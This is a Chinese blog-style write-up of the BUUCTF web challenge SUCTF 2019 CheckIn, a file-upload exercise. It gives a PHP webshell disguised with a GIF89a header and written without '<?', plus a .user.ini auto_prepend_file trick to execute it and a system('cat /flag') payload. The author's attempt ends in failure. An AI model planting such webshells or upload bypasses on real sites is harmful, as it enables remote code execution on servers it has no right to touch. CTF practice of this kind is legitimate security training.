106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
麦兜*20 小时前
【HTTP】防XSS+SQL注入:自定义HttpMessageConverter过滤链深度解决方案
java·网络·spring boot·sql·spring·http·xss
江湖没什么好的9 天前
原型链污染
xss
taolichao3010 天前
XSS内容分享
前端·xss
dydydydydszjl10 天前
xss漏洞
前端·xss
2201_7534369510 天前
xss-labs解答
android·php·xss
long_mingyue11 天前
JavaScript 对象操作、继承与模块化实现
javascript·原型模式·xss
x_SpiderMan11 天前
XSS原型与原型链
前端·原型模式·xss
password大鸭梨11 天前
xss跨站脚本攻击
网络·web安全·xss
lq_ioi_pl11 天前
XSS GAME靶场
前端·javascript·xss
绘世繁星11 天前
XSS Game前八关
java·前端·xss